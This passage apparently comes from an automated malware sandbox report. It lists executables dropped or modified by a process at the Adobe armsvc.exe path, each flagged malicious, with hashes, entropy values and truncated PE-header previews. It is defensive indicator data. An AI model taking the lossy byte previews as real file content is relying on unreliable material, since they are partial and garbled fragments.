                                                                                                                                                        Entropy (8bit):6.543141193920669
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1572864:SNVpTyR96CwKImp81ujlSHFsQ4adtZp20wfP+9HgoZRZa:SQ9lw68HSq
                                                                                                                                                        MD5:36324D91BFDEA887815798D349594680
                                                                                                                                                        SHA1:A9D8B784E6C17549FA5590F5FB2B185BED78CEFF
                                                                                                                                                        SHA-256:6661ED46ECC059CCC9A608DF0174DC4B45F2F722C9DF3C792B0C837E733B041F
                                                                                                                                                        SHA-512:89316C1B7E859B1BBC214CE105EDE5677A049D817C4E7062A3F17626AB145D3A803A9F54DD5D4585171B997E6C3AF43B75C809A56B72CF3426483FF56832EBB4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......X.mj.r.9.r.9.r.9...9.r.9|..8.r.9|..8;r.9|..8.r.9|..8.r.9...8.r.9...8.r.9...8.r.9.r.9Gm.9y..8.r.9y..8.r.9y..8.o.9y..8.r.9y..9.r.9.r.9.r.9y..8.r.9Rich.r.9........PE..L......e..........".... .._.........y........@f...@.......................... 5....._.4.................................[.......h......$DW.........................,q..8...................(.q...... `.@.............`.....d........................text...,._......._................. ..`.rdata...bM...`..dM..._.............@..@.data................\..............@....detourc.............p..............@..@.c2r.....................................rsrc...$DW.....FW.................@..@.reloc....$.. ....#.................@...........................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):2084864
                                                                                                                                                        Entropy (8bit):6.486755929548313
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:XfGLQ6Dk50AMsjYU6LNiXicJFFRGNzj3:PmQ6D+8sje7wRGpj3
                                                                                                                                                        MD5:6BDBEEE7DCE043A1971E6C9E1105C9BA
                                                                                                                                                        SHA1:D2A2FDFE83AB29235F24CF897ACEA63486456749
                                                                                                                                                        SHA-256:D93AD778B24BBB3F7D55716A2FE557A54E147726F01FE4D3E8D6E0D4EC481AD3
                                                                                                                                                        SHA-512:0C551494100AABAED026984B3697B1E12EE1BAA7CEAF9352DB37899024C65D197CBB6CD3DFE4F12265A260751CA19543C0042CFA57FF8E9B4BE2C46B8EC3044F
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?#..Qp..Qp..Qp...p..Qp.Pq..Qp.Uq..Qp.Rq..QpG.Tq..Qp.Tq..QpG.Uq..QpG.Vq..QpG.Pq..Qp..Pp..Qp.Xq..Qp.Tq..Qp.p..Qp...p..Qp.Sq..QpRich..Qp........PE..L......e............... .....................@....@........................... ........................................................................................8.......................... q..@............0......4........................text............................... ..`.rdata..T....0......................@..@.data...8j.......j..................@....c2r.................d...................rsrc...............f..............@..@.reloc.......0......................@...........................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):40811520
                                                                                                                                                        Entropy (8bit):6.461193898736236
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:786432:MbuMdv8TOUI/JgcnYblPv+msZPH53u5LBsk/Q4YbFuceo4h5ay3I5:MyM8TOtIlPv+msZPH1u5WkID5uceo4qR
                                                                                                                                                        MD5:76E257760DF5241CAFEB3EB3A9001824
                                                                                                                                                        SHA1:AD8412F7B9B3BF773870D0F4201F159D21D89D98
                                                                                                                                                        SHA-256:E12CB010F8B2A0DFFC9A912E52712CFFA102474255B7F3D2DA7F2A1E32665379
                                                                                                                                                        SHA-512:FA003BCCA8E46349DA20C7CB5C31BC2C50E58DB8AAE14CB57A4DD5A0396DF4C895147F8885AAC880C124C8116BB7B158D3BE093ECD3586FD8E41D90FAB2D7EBE
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........j............sI.....q......q......q......q.....Jy.....Jy.....Jy.............q......q......q......q......q%.....M.....q.....Rich....................PE..L......e............... ............h.......`....@...........................o......_o.............................4...^....P..T....`...]>.............................8........................... 5..@............ ..l............................text...P........................... ..`.rdata..8.;.. ....;.................@..@.data....<.......0..................@....detourc.....0......................@..@.c2r....|....P...........................rsrc....]>..`...^>.................@..@.reloc...P....S..@...|S.............@...................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1812992
                                                                                                                                                        Entropy (8bit):5.250011566100095
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:od8DMeflpnIOvYUV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:oCDD9pnIODLNiXicJFFRGNzj3
                                                                                                                                                        MD5:076580187D628AF25F339B2EF1C035FB
                                                                                                                                                        SHA1:3A2742C348B4F84075EC5242BA5D4959ACE069AE
                                                                                                                                                        SHA-256:90056312C7F8E210922B7D3F3193E4ADC139136920EAA0A80D643E66963B8574
                                                                                                                                                        SHA-512:F5E107CC7290FA2F64F9E78B31A660DB1F4D65544F70A6F4D2A3702C638FFAF78A29A345ED49B840E9CDF141DB45CA0634581F5ECB92A61E1A11B6B730FC2921
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@..............................'........... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...`..........................@...................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4364800
                                                                                                                                                        Entropy (8bit):6.7456443612302435
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:VB1sstqMHiq8kBfK9a+cOVE/TqEpEepdkRqqUu9wg6KFYso8l8EELNiXicJFFRGN:hHzorVmr2gkRpdJYol+7wRGpj3
                                                                                                                                                        MD5:F11BB48A90C853BEF86540A86A5C2286
                                                                                                                                                        SHA1:A7B992728E77FA425DC1DFCB50A43C27653926C1
                                                                                                                                                        SHA-256:2D4C7575025E30CA88612220AF3B7FCD872876B6C93A4EDA058056F9CDFE9365
                                                                                                                                                        SHA-512:9B96D7BE65967FF93F5D608B57F27E4E78F5A3859A0B5D8B2A01E9FDA9F7DC527598D585F35625AE7A29AEC874D7AD37DA28011126B5DD499E848896F42C6FCE
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD......LC... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1394176
                                                                                                                                                        Entropy (8bit):4.671281447266333
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:ZEyTz/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:+ynLNiXicJFFRGNzj3
                                                                                                                                                        MD5:0AAC2BA0E3D9C2BC4C894EFD830B7267
                                                                                                                                                        SHA1:BEF548BFA5F45B38B66427223BB7BA0CF5889F5F
                                                                                                                                                        SHA-256:076313D0633B2B04E2D1C8C1E222C22A489E79D66355F1C38FDBD479A3DB1EE7
                                                                                                                                                        SHA-512:330D054B15AEC706D2EFA8D46D2EA9C3A7A747ACCA2397FF64D605D73E1529D9D0F8077B195859D69E7C0F61813F18E00F14B238CF2C9058C80C910C316C2AAD
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................` .....?..... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...`..........................@...........................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2354176
                                                                                                                                                        Entropy (8bit):7.045020696633033
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:1hDdVrQ95RW0YQHyWQXE/09Val0GjLNiXicJFFRGNzj3:1hHYWmHyWK47wRGpj3
                                                                                                                                                        MD5:F658B7D7CBCE308B133C9A2238E1C99E
                                                                                                                                                        SHA1:CCB0FEE3EF0BD99177EAC6AF337ADFD5CB2CF4FF
                                                                                                                                                        SHA-256:890B54D3D42B252562F8B3F51BB0EB7B28D5E7BE204DFF34C08D0DF63C39ECB1
                                                                                                                                                        SHA-512:7D6F6D48E0ED4BCEA2F0A83B87167EA7D17A461EC3C1737205ABAE039B71E07E1F0A4BB527FCC94A9A104BB9AC648F0F8A9DEE07F500783B1181693CAB6FBE54
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.......$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1825280
                                                                                                                                                        Entropy (8bit):7.152092244612075
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:h70E0ZCQZMib6Rrt9RoctGfmddU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:l0EzQS7RPRoc1gLNiXicJFFRGNzj3
                                                                                                                                                        MD5:056FD57A8B139AA591393C94C2FBD99A
                                                                                                                                                        SHA1:14E1DC26DC1ADB66A485AB7AC391E50F1903416B
                                                                                                                                                        SHA-256:14A8944480F01E7E6B22F49DB43E27C109884BF905C27CC2DA8679472EE02630
                                                                                                                                                        SHA-512:F5E3CEED8994E153C6C6CC08043E2A1C1FDDB314D585C937265FEE9A4FC4CB155F919E01990866A1CC9F1C76B602B74BD0E4FD8C80176D46FF7D7BBBBBF78D85
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0......=..... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1847808
                                                                                                                                                        Entropy (8bit):7.139170983745919
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:MiD2VmA1YXiHwlklb8boUuWPg2gH/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:PD2VmAygwIb8boQkLNiXicJFFRGNzj3
                                                                                                                                                        MD5:6A905566C993DB0B23924B519B5E600B
                                                                                                                                                        SHA1:D64330AC06EB39BA6130BE4233344DFD809D1A77
                                                                                                                                                        SHA-256:DD09FABD5DEA1B57163AFFB4DF0EFE5BB0F969EA40359BCAA729EA6F4061E8C2
                                                                                                                                                        SHA-512:C8E9F5618CA190F14D9AA72D5C8CBC231776A90B3C60D7C1B981E4AB04E53BF3CD594A153844606A8716628755739977B6CE77837468DA84A318B42E99217CDB
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2853376
                                                                                                                                                        Entropy (8bit):6.946960495463991
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:OfD3zO9ZhBGlohzM3HRNr008LNiXicJFFRGNzj3:0DaalSzM0087wRGpj3
                                                                                                                                                        MD5:6DBF827DBF1BF9FF2935615AC7378B51
                                                                                                                                                        SHA1:0B64876D49BF52DD4951AE9362AA7E9D67907603
                                                                                                                                                        SHA-256:93F4996CBB8159A73DD25AD1A8D7E0C193A65891549EFC1EF6B5558C95E0FFF0
                                                                                                                                                        SHA-512:3F79D9B25AB3193C2A512BF0F9C77ADFB2629FAA0C34D9E77F585E01F3CB23FCCE0058D2BC4B7A0273FA512BA1DADDB875CADE2EAF39DFF82C66DB799A0F56B6
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.....k.,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4320256
                                                                                                                                                        Entropy (8bit):6.821898113573932
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:ZTaRe7mkn5KLvD5qGVC008/pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhLLNiXicJy:oI72Lvkr4pbxJRoIMU7wRGpj3
                                                                                                                                                        MD5:0DE171C85A655D6B0D5359ED2B61DDA6
                                                                                                                                                        SHA1:BF3AFD6726E20484626FBEF88DD8F5D3B96336A1
                                                                                                                                                        SHA-256:4F0118D5D005AF6DF53E14E92BCA9BE204233054E0C3A80CA912CC131CBCEC57
                                                                                                                                                        SHA-512:7D434B3C6BB6B0C83E562DBE9AF70BBEC54F85E44FAB24B7F8C3D2116BA02553603400FB8E6D8AC0E871B44AD9E2B63E53B65B22F0535BAD930F2EC617C702D4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2062336
                                                                                                                                                        Entropy (8bit):7.091530495281737
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:4W9Jml9mmijxiMnF+ZxmQWcbLw8VE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:4Wnm5iAMkjmQWkVELNiXicJFFRGNzj3
                                                                                                                                                        MD5:7C1ABA15BE63C84FB318B93A189E7094
                                                                                                                                                        SHA1:6DA6928D3BCDD92897104793EDC976646E573EED
                                                                                                                                                        SHA-256:E92D03EBF3923B1C299B4A0645DD7746B7A67CB4299CF9789DD45A9D5290F71E
                                                                                                                                                        SHA-512:C06060A1329BAE67DE66D3D6004C3BF2A1DC6CD4C5D5CEB4EBEB05C39BA6456BB59D007638F4874FE40937EFCD96BEB7AD2DCD2B25E745EA3F11C299F279C726
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .....#..... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                        Entropy (8bit):7.159894701681151
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:awNHwoYhua6MZERO4qbBJTY6mY1uIgG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:awNPdNO7BJTfmEdLNiXicJFFRGNzj3
                                                                                                                                                        MD5:8D8B5DD537F285F18DADC216EE0BB9D2
                                                                                                                                                        SHA1:AA29ADF0509091BE4B90D8AFC5CFE8CE97E2DB79
                                                                                                                                                        SHA-256:843364501E649EE1D2862C45D68F2B6E344B573A28709A38BE4E42CC68467D5F
                                                                                                                                                        SHA-512:4461684509F3B83F114DD96EC6F1A0156B2F62F58E87ECC2DE1519E858160CAC463F54E8B82EE4877E25D38C1E9B92708FE82BDEBC62544F36C99A9081A773D3
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1847808
                                                                                                                                                        Entropy (8bit):7.139168238832852
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:+iD2VmA1YXiHwlklb8boUuWPg2gH/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:dD2VmAygwIb8boQkLNiXicJFFRGNzj3
                                                                                                                                                        MD5:184B982D4C91BAD552593BD43843DFA4
                                                                                                                                                        SHA1:F1A5455632766C5881B7216CCB523F577606A143
                                                                                                                                                        SHA-256:10DE34DCA4D8D51CF90C7C00F9C3EC7B3011D455FC195FBEA02D0DE41EE6A98A
                                                                                                                                                        SHA-512:1A57B50FBEF71CBDE1C07611FC1B60E829C771C6A359F5D2D10A358F30F512D70F50BFBC87B2327061CDBA4A839C14DF1728F1AC8B9C465E698BB2C6360B1B54
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                        Entropy (8bit):7.159888988800873
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:nwNHwoYhua6MZERO4qbBJTY6mY1uIgG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:nwNPdNO7BJTfmEdLNiXicJFFRGNzj3
                                                                                                                                                        MD5:7B10CBAF80B695AA893FFFAA2C8B337F
                                                                                                                                                        SHA1:9381955108A1944B5355B62BF02798C1AB128E43
                                                                                                                                                        SHA-256:3EE6AF9BDE4130E8F49E6129BFCC7CFDA051B880AAC33E9D044F87827E1641E0
                                                                                                                                                        SHA-512:0F688FA9CF2D555D203427079462D40100CFED5B0987389E54AD341987A52B5407A1546B1228AB1183640EBF41ED95675E7A13CB198F64D0F87E440FF362174E
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................Q..... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1481216
                                                                                                                                                        Entropy (8bit):4.694124027954958
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:w6lbht6BHx/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:blNtqHxLNiXicJFFRGNzj3
                                                                                                                                                        MD5:DE04E32ABEF0B4DECE7B47514D8652D9
                                                                                                                                                        SHA1:4485EDD9C2153C0707DB85E9B6ECC87F4B7844EF
                                                                                                                                                        SHA-256:5229F863E89A439A1D23F91B854F34FD6C0D8183E9784FFB13D667D620309323
                                                                                                                                                        SHA-512:B3D73820677483A81DF821E95BC412DD04A77226A113ABF14814BC0E832899B6B02ABACD573F155AE2BF92A67C293A7856410DF80903D81C63CD22E5B5C5F8B8
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@...........................!.............................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...p...0......................@...........................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1376768
                                                                                                                                                        Entropy (8bit):4.656844797876757
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:7IxkTBVd/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kxk1VdLNiXicJFFRGNzj3
                                                                                                                                                        MD5:4C0CB4AA5222FBCE1F097D7DA1517110
                                                                                                                                                        SHA1:B1897648BCAF446EAD74490C7E8CD21345D65236
                                                                                                                                                        SHA-256:9618570165F95F1EA79ADDDA49372F720DD6BD89273E3FB9073DFA2A2995B885
                                                                                                                                                        SHA-512:F404FE39475C52D781D7EC5D451B5665C12CF8D1E832988FF123D7F8BD5F358DEE82248752E09DBF84598564FFB5CE65DAC649A21F83E8473F3FDED7399681D6
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@........................... .............................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...p...........R..............@...................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1490944
                                                                                                                                                        Entropy (8bit):4.787369457215186
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:Fcssmro/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:CbvLNiXicJFFRGNzj3
                                                                                                                                                        MD5:2F3B5ACFE71DAF3C82AF6AF080B24BEF
                                                                                                                                                        SHA1:F5D80D4A4FC950AAD189C5C8351655456817762B
                                                                                                                                                        SHA-256:650DA1479636DB10E7B35AFDD64CA7BE1CC5752EF13314C11C17687C33B40B9B
                                                                                                                                                        SHA-512:FEE976E724D9BD6D59B3DAAD2CC147E3FEB3B14CF361D702A5A865D99881A6922E1E97BBD79FCB3FA6F6B765F846940F3A5D430C1021D1EB681A9516A34144C6
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@..............................!.....N..... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...`........... ..............@...........................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1539584
                                                                                                                                                        Entropy (8bit):4.896550665238408
                                                                                                                                                        Encrypted:false
